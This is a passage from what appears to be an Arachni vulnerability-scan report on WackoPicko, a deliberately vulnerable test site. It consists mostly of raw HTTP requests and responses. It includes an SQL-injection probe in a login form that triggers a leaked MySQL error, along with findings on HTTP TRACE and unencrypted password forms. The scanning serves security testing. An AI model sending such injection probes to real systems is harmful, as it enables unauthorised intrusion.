Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 66
Content-Type: application/x-www-form-urlencoded

username=arachni_name%22%27%60--&password=5543%21%25arachni_secret
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:55 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 194
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`--' and `password` = SHA1( CONCAT('5543!%arachni_secret', `salt`)) limit 1' at line 1
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP TRACE 1 xst

The TRACE HTTP method allows a client so send a request to the server, and have the same request then send back in the server’s response. This allows the client to determine if the server is receiving the request as expected or if specific parts of the request are not arriving as expected. For example incorrect encoding or a load balancer has filtered or changed a value. On many default installations the TRACE method is still enabled.

While not vulnerable by itself, it does provide a method for cyber-criminals to bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to successfully access a session token.

Arachni has discovered that the affected page permits the HTTP TRACE method.

Remediation guidance

The HTTP TRACE method is normally not required within production sites and should therefore be disabled.

Depending on the function being performed by the web application, the risk level can start low and increase as more functionality is implemented.

The remediation is typically a very simple configuration change and in most cases will not have any negative impact on the server or application.

Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

TRACE /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Transfer-Encoding: chunked
Content-Type: message/http

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Unencrypted password form 5 unencrypted_password_forms

The HTTP protocol by itself is clear text, meaning that any data that is transmitted via HTTP can be captured and the contents viewed.

To keep data private, and prevent it from being intercepted, HTTP is often tunnelled through either Secure Sockets Layer (SSL), or Transport Layer Security (TLS). When either of these encryption standards are used it is referred to as HTTPS.

Cyber-criminals will often attempt to compromise credentials passed from the client to the server using HTTP. This can be conducted via various different Man-in-The-Middle (MiTM) attacks or through network packet captures.

Arachni discovered that the affected page contains a password input, however, the value of the field is not sent to the server utilising HTTPS. Therefore it is possible that any submitted credential may become compromised.

Remediation guidance

The affected site should be secured utilising the latest and most secure encryption protocols. These include SSL version 3.0 and TLS version 1.2. While TLS 1.2 is the latest and the most preferred protocol, not all browsers will support this encryption method. Therefore, the more common SSL is included. Older protocols such as SSL version 2, and weak ciphers (< 128 bit) should also be disabled.

Proof
<form action="/WackoPicko/users/register.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      First Name :
    </td>
    <td>
      <input type="text" name="firstname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Last Name :
    </td>
    <td>
      <input type="text" name="lastname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password again :
    </td>
    <td>
      <input type="password" name="againpass">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="Create Account!">
      </input>
    </td>
    <td>
      
    </td>
  </tr>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<form action="/WackoPicko/users/register.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      First Name :
    </td>
    <td>
      <input type="text" name="firstname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Last Name :
    </td>
    <td>
      <input type="text" name="lastname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password again :
    </td>
    <td>
      <input type="password" name="againpass">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="Create Account!">
      </input>
    </td>
    <td>
      
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/register.php http://192.168.0.26/WackoPicko/users/register.php
username
firstname
lastname
password
againpass
username
firstname
lastname
password
againpass
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
<form action="/WackoPicko/users/register.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      First Name :
    </td>
    <td>
      <input type="text" name="firstname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Last Name :
    </td>
    <td>
      <input type="text" name="lastname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password again :
    </td>
    <td>
      <input type="password" name="againpass">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="Create Account!">
      </input>
    </td>
    <td>
      
    </td>
  </tr>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<form action="/WackoPicko/users/register.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      First Name :
    </td>
    <td>
      <input type="text" name="firstname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Last Name :
    </td>
    <td>
      <input type="text" name="lastname">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password again :
    </td>
    <td>
      <input type="password" name="againpass">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="Create Account!">
      </input>
    </td>
    <td>
      
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/register.php http://192.168.0.26/WackoPicko/users/register.php
username
firstname
lastname
password
againpass
username
firstname
lastname
password
againpass
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/register.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html

<html>
  <head>
